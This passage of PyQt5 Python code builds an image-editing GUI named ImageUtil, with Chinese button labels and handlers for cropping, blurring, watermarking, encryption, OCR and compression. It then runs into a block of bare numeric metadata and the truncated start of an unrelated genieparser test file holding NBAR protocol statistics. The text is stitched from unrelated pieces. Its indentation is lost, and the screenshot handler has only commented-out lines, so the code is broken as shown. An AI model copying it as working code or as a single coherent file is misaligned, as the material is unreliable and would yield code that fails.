palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_decode.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_decode.setFont(font)
self.btn_decode.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_decode.setObjectName("btn_decode")
self.verticalLayout_2.addWidget(self.btn_decode)
self.btn_ocr = QtWidgets.QToolButton(self.frame_5)
self.btn_ocr.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_ocr.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_ocr.setFont(font)
self.btn_ocr.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_ocr.setObjectName("btn_ocr")
self.verticalLayout_2.addWidget(self.btn_ocr)
self.btn_screenshot = QtWidgets.QToolButton(self.frame_5)
self.btn_screenshot.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_screenshot.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_screenshot.setFont(font)
self.btn_screenshot.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_screenshot.setObjectName("btn_screenshot")
self.verticalLayout_2.addWidget(self.btn_screenshot)
self.btn_pick_color = QtWidgets.QToolButton(self.frame_5)
self.btn_pick_color.setMinimumSize(QtCore.QSize(50, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))
brush.setStyle(QtCore.Qt.NoBrush)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
self.btn_pick_color.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.btn_pick_color.setFont(font)
self.btn_pick_color.setStyleSheet("background: rgba(0, 0, 0, 0);\n"
"color: rgb(255, 255, 255)")
self.btn_pick_color.setObjectName("btn_pick_color")
self.verticalLayout_2.addWidget(self.btn_pick_color)
self.slider_blur = QtWidgets.QSlider(self.frame_4)
self.slider_blur.setEnabled(True)
self.slider_blur.setGeometry(QtCore.QRect(10, 130, 71, 22))
self.slider_blur.setOrientation(QtCore.Qt.Horizontal)
self.slider_blur.setObjectName("slider_blur")
self.slider_compress = QtWidgets.QSlider(self.frame_4)
self.slider_compress.setEnabled(True)
self.slider_compress.setGeometry(QtCore.QRect(10, 170, 71, 22))
self.slider_compress.setOrientation(QtCore.Qt.Horizontal)
self.slider_compress.setObjectName("slider_compress")
self.slider_lightness = QtWidgets.QSlider(self.frame_4)
self.slider_lightness.setEnabled(True)
self.slider_lightness.setGeometry(QtCore.QRect(11, 50, 71, 22))
self.slider_lightness.setOrientation(QtCore.Qt.Horizontal)
self.slider_lightness.setObjectName("slider_lightness")
self.horizontalLayout.addWidget(self.frame_4)
self.frame_3 = QtWidgets.QFrame(self.centralwidget)
self.frame_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame_3.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame_3.setObjectName("frame_3")
self.gridLayout = QtWidgets.QGridLayout(self.frame_3)
self.gridLayout.setObjectName("gridLayout")
self.img_panel = ImageLabel(self.frame_3)
self.img_panel.setObjectName("img_panel")
self.gridLayout.addWidget(self.img_panel, 0, 0, 1, 1)
self.horizontalLayout.addWidget(self.frame_3)
self.verticalLayout_3.addLayout(self.horizontalLayout)
MainWindow.setCentralWidget(self.centralwidget)
self.action = QtWidgets.QAction(MainWindow)
self.action.setObjectName("action")
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "ImageUtil"))
self.btn_open.setText(_translate("MainWindow", "打开"))
self.btn_save.setText(_translate("MainWindow", "保存"))
self.btn_undo.setText(_translate("MainWindow", "恢复"))
self.btn_confirm.setText(_translate("MainWindow", "确定"))
self.btn_cancel.setText(_translate("MainWindow", "取消"))
self.btn_clip.setText(_translate("MainWindow", "裁剪"))
self.btn_lightness.setText(_translate("MainWindow", "亮度"))
self.btn_watermark.setText(_translate("MainWindow", "水印"))
self.btn_blur.setText(_translate("MainWindow", "模糊"))
self.btn_compress.setText(_translate("MainWindow", "压缩"))
self.btn_filter.setText(_translate("MainWindow", "滤镜"))
self.btn_encode.setText(_translate("MainWindow", "加密"))
self.btn_decode.setText(_translate("MainWindow", "解密"))
self.btn_ocr.setText(_translate("MainWindow", "OCR"))
self.btn_screenshot.setText(_translate("MainWindow", "截图"))
self.btn_pick_color.setText(_translate("MainWindow", "取色"))
self.action.setText(_translate("MainWindow", "调整"))
@QtCore.pyqtSlot()
def on_btn_open_clicked(self):
"""
“打开” 按钮的点击事件
"""
img_name, img_type = QFileDialog.getOpenFileName(self, "打开图片", "", "*.jpg;;*.png;;*.jpeg")
if (img_name == "") or (img_name is None):
self.__show_warning_message_box("未选择图片")
return
img = cv2.imread(img_name) # 读取图像
# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道
self.showImage(img)
self.__current_img = img
self.__last_img = self.__current_img
self.__original_img = copy.deepcopy(self.__current_img)
self.__original_img_path = img_name
def showImage(self, img, is_grayscale=False):
x = img.shape[1] # 获取图像大小
y = img.shape[0]
self.zoomscale = 1 # 图片放缩尺度
bytesPerLine = 3 * x
if len(img.shape) == 2: # 判断是否为灰度图,如果是灰度图,需要转换成三通道图
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
frame = QImage(img.data, x, y, bytesPerLine, QImage.Format_RGB888).rgbSwapped()
pix = QPixmap.fromImage(frame)
self.img_panel.setPixmap(pix)
self.img_panel.repaint()
def __show_warning_message_box(self, msg):
QMessageBox.warning(self, "警告", msg, QMessageBox.Ok)
def __show_info_message_box(self, msg):
QMessageBox.information(self, "提示", msg, QMessageBox.Ok)
@QtCore.pyqtSlot()
def on_btn_undo_clicked(self):
"""
“恢复” 按钮的点击事件,将图片恢复到最初的状态
:return:
"""
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
self.__current_img = self.__original_img
self.__last_img = self.__current_img
self.showImage(self.__current_img)
@QtCore.pyqtSlot()
def on_btn_save_clicked(self):
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
ext_name = self.__original_img_path[self.__original_img_path.rindex("."):]
img_path, img_type = QFileDialog.getSaveFileName(self, "保存图片", self.__original_img_path, "*" + ext_name)
cv2.imwrite(img_path, self.__current_img)
@QtCore.pyqtSlot()
def on_btn_confirm_clicked(self):
self.control.hide()
# 根据操作类型进行相应的处理
if self.__current_operation == "clip":
x_start, x_end = self.img_panel.img_x_start, self.img_panel.img_x_end
y_start, y_end = self.img_panel.img_y_start, self.img_panel.img_y_end
self.__current_img = crop_image(self.__current_img, x_start, x_end, y_start, y_end)
self.showImage(self.__current_img)
self.img_panel.clearRect()
self.img_panel.flag = False # 标记 img_panel 不能绘制矩形,从而禁止选择裁剪区域
elif self.__current_operation == "lightness":
self.slider_lightness.setValue(int((self.__lightness_max + self.__lightness_min) / 2))
elif self.__current_operation == "blur":
x_start, x_end = self.img_panel.img_x_start, self.img_panel.img_x_end
y_start, y_end = self.img_panel.img_y_start, self.img_panel.img_y_end
# 内核大小 (3, 3) (9, 9) (15, 15)
self.__current_img = gaussian_blur(self.__current_img, x_start, x_end, y_start, y_end, (9, 9), 5)
self.showImage(self.__current_img)
self.img_panel.clearRect()
self.img_panel.flag = False # 标记 img_panel 不能绘制矩形
self.__last_img = self.__current_img # 将当前操作得到的图片结果保存到 last_img 中(相对于后面的操作而言,本次操作的结果就是 last 的)
self.__current_operation = None
@QtCore.pyqtSlot()
def on_btn_cancel_clicked(self):
self.control.hide()
if self.__current_operation in ["clip", "blur"]:
self.img_panel.clearRect()
self.img_panel.flag = False # 标记 img_panel 不能绘制矩形,从而禁止选择裁剪区域
elif self.__current_operation == "lightness":
self.slider_lightness.setValue(int((self.__lightness_max + self.__lightness_min) / 2))
self.__current_img = self.__last_img
self.showImage(self.__current_img)
self.__current_operation = None
@QtCore.pyqtSlot()
def on_btn_clip_clicked(self):
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
self.__current_operation = "clip"
self.img_panel.flag = True # 标记 img_panel 可以绘制矩形,从而选择裁剪区域
self.img_panel.setCursor(Qt.CrossCursor)
self.control.show()
@QtCore.pyqtSlot()
def on_slider_lightness_sliderPressed(self):
"""
“亮度” 滑动块 滑动按压操作的事件监听(即开始拖动)
"""
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
self.__current_operation = "lightness"
self.control.show()
@QtCore.pyqtSlot()
def on_slider_lightness_sliderReleased(self):
"""
“亮度” 滑动块 滑动释放操作的事件监听(即停止拖动)
"""
if self.__current_img is None:
return
self.__current_img = adjust_lightness(self.__last_img, self.slider_lightness.value())
self.showImage(self.__current_img)
self.slider_lightness.hide()
@QtCore.pyqtSlot()
def on_btn_screenshot_clicked(self):
"""
截图
"""
# screen_img = QGuiApplication.primaryScreen().grabWindow(QApplication.desktop().winId())
# screen_img_path = "{0}/ui/screenshot.png".format(os.getcwd())
# label = ImageLabel()
# label.showFullScreen()
# label.setPixmap(screen_img)
# screen_img.save(screen_img_path)
# self.showImage(screen_img)
@QtCore.pyqtSlot()
def on_btn_pick_color_clicked(self):
"""
取色
"""
# 保持对话框一直存在,需要将其实例化为全局变量或调用 exec_() (该方法只存在于 Dialog 控件,Widget 控件没有该方法)
# 方法一
# self.colorCatcher = ColorCatcher()
# self.colorCatcher.show()
# 方法二
colorCatcher = ColorCatcher()
colorCatcher.exec_()
@QtCore.pyqtSlot()
def on_btn_watermark_clicked(self):
"""
添加水印
:return:
"""
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
self.__current_operation = "watermark"
dialog = WatermarkDialog()
dialog.show()
dialog.exec_()
position = dialog.get_watermark_position()
watermark = dialog.get_watermark_text()
self.__current_img = add_watermark(self.__last_img, watermark, position, (255, 0, 0))
# self.__current_img = add_watermark(self.__current_img, watermark, position, (255, 0, 0))
self.showImage(self.__current_img)
self.control.show()
@QtCore.pyqtSlot()
def on_btn_blur_clicked(self):
"""
高斯模糊
:return:
"""
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
self.__current_operation = "blur"
self.img_panel.flag = True # 标记 img_panel 可以绘制矩形,从而选择模糊区域
self.img_panel.setCursor(Qt.CrossCursor)
self.control.show()
@QtCore.pyqtSlot()
def on_btn_compress_clicked(self):
"""
压缩图片大小
"""
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
dialog = CompressDialog()
dialog.show()
dialog.exec_()
# 获取用户输入的长、宽
w = dialog.input_width.text()
h = dialog.input_height.text()
# 判断用户是否输入长、宽
if (w == "") or (w is None):
self.__show_warning_message_box("未输入宽度")
return
if (h == "") or (h is None):
self.__show_warning_message_box("未输入长度")
return
self.__current_img = compress_img(self.__current_img, (int(w), int(h)))
self.showImage(self.__current_img)
self.__show_info_message_box("压缩完成")
@QtCore.pyqtSlot()
def on_btn_img_stitching_clicked(self):
left_img_path = "D:/Code/03-python-code/Python/ImageUtil/com/zeketian/imageutil/hnu1.png"
left_img = cv2.imread(left_img_path) # 读取左边的图像
left_img_path2 = "D:/Code/03-python-code/Python/ImageUtil/com/zeketian/imageutil/hnu2.png"
left_img2 = cv2.imread(left_img_path2) # 读取左边的图像
result_img = img_stitching([left_img, left_img2])
self.showImage(result_img)
@QtCore.pyqtSlot()
def on_btn_filter_clicked(self):
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
dialog = FilterDialog()
dialog.show()
dialog.exec_()
self.__current_img = add_filter(self.__last_img, dialog.filter_type)
self.showImage(self.__current_img)
self.control.show()
@QtCore.pyqtSlot()
def on_btn_encode_clicked(self):
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
dir_path = QFileDialog.getExistingDirectory(self, "请选择保存密钥的文件夹", os.getcwd())
self.__current_img = img_encoding(self.__current_img, dir_path)
self.showImage(self.__current_img)
@QtCore.pyqtSlot()
def on_btn_decode_clicked(self):
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
# imgName, imgType = QFileDialog.getOpenFileName(self, "选择密钥文件", "", "*.npy;;*.png;;All Files(*)")
key_file_path, key_type = QFileDialog.getOpenFileName(self, "请选择密钥文件", "", "*.npy")
self.__current_img = img_decoding(self.__current_img, key_file_path)
self.showImage(self.__current_img)
@QtCore.pyqtSlot()
def on_btn_ocr_clicked(self):
if self.__current_img is None:
self.__show_warning_message_box("未选择图片")
return
img = None
with open(self.__original_img_path, 'rb') as fp:
img = fp.read()
result = img_ocr(img)
dialog = OcrDialog()
dialog.plainTextEdit.setPlainText(result)
dialog.show()
dialog.exec_()
| 54.525522
| 116
| 0.679252
| 11,288
| 94,002
| 5.58478
| 0.03579
| 0.150743
| 0.090608
| 0.118923
| 0.857252
| 0.843086
| 0.818372
| 0.806856
| 0.805285
| 0.800828
| 0
| 0.042309
| 0.197666
| 94,002
| 1,723
| 117
| 54.557168
| 0.793546
| 0.014574
| 0
| 0.780275
| 1
| 0.001248
| 0.021818
| 0.001765
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014981
| false
| 0
| 0.006866
| 0
| 0.031835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
01dfc30ccff4f4b951e8a331b71319e4d867400e
| 6,034
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowIpNbarDiscovery/cli/equal/golden_output1_expected.py
|
gwoodwa1/genieparser
|
def326da3745c0beb59df575e5f94f9cba961947
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpNbarDiscovery/cli/equal/golden_output1_expected.py
|
gwoodwa1/genieparser
|
def326da3745c0beb59df575e5f94f9cba961947
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowIpNbarDiscovery/cli/equal/golden_output1_expected.py
|
gwoodwa1/genieparser
|
def326da3745c0beb59df575e5f94f9cba961947
|
[
"Apache-2.0"
] | null | null | null |
expected_output = {
'interface': {
'GigabitEthernet1': {
'protocol': {
'ssh': {
'in_packet_count': 422,
'out_packet_count': 451,
'in_byte_count': 3000,
'out_byte_count': 4000,
'in_5min_bit_rate_bps': 3000,
'out_5min_bit_rate_bps': 4000,
'in_5min_max_bit_rate_bps': 3000,
'out_5min_max_bit_rate_bps': 4000
},
'unknown': {
'in_packet_count': 215,
'out_packet_count': 8,
'in_byte_count': 3000,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 3000,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 3000,
'out_5min_max_bit_rate_bps': 0
},
'dns': {
'in_packet_count': 42,
'out_packet_count': 0,
'in_byte_count': 2000,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 2000,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 2000,
'out_5min_max_bit_rate_bps': 0
},
'ldp': {
'in_packet_count': 83,
'out_packet_count': 81,
'in_byte_count': 0,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 0,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 0,
'out_5min_max_bit_rate_bps': 0
},
'eigrp': {
'in_packet_count': 84,
'out_packet_count': 84,
'in_byte_count': 0,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 0,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 0,
'out_5min_max_bit_rate_bps': 0
},
'ospf': {
'in_packet_count': 42,
'out_packet_count': 42,
'in_byte_count': 0,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 0,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 0,
'out_5min_max_bit_rate_bps': 0
},
'ping': {
'in_packet_count': 9,
'out_packet_count': 9,
'in_byte_count': 0,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 0,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 0,
'out_5min_max_bit_rate_bps': 0
},
'Total': {
'in_packet_count': 897,
'out_packet_count': 675,
'in_byte_count': 8000,
'out_byte_count': 4000,
'in_5min_bit_rate_bps': 8000,
'out_5min_bit_rate_bps': 4000,
'in_5min_max_bit_rate_bps': 8000,
'out_5min_max_bit_rate_bps': 4000
}
}
},
'GigabitEthernet2': {
'protocol': {
'unknown': {
'in_packet_count': 213,
'out_packet_count': 7,
'in_byte_count': 3000,
'out_byte_count': 0,
'in_5min_bit_rate_bps': 3000,
'out_5min_bit_rate_bps': 0,
'in_5min_max_bit_rate_bps': 3000,
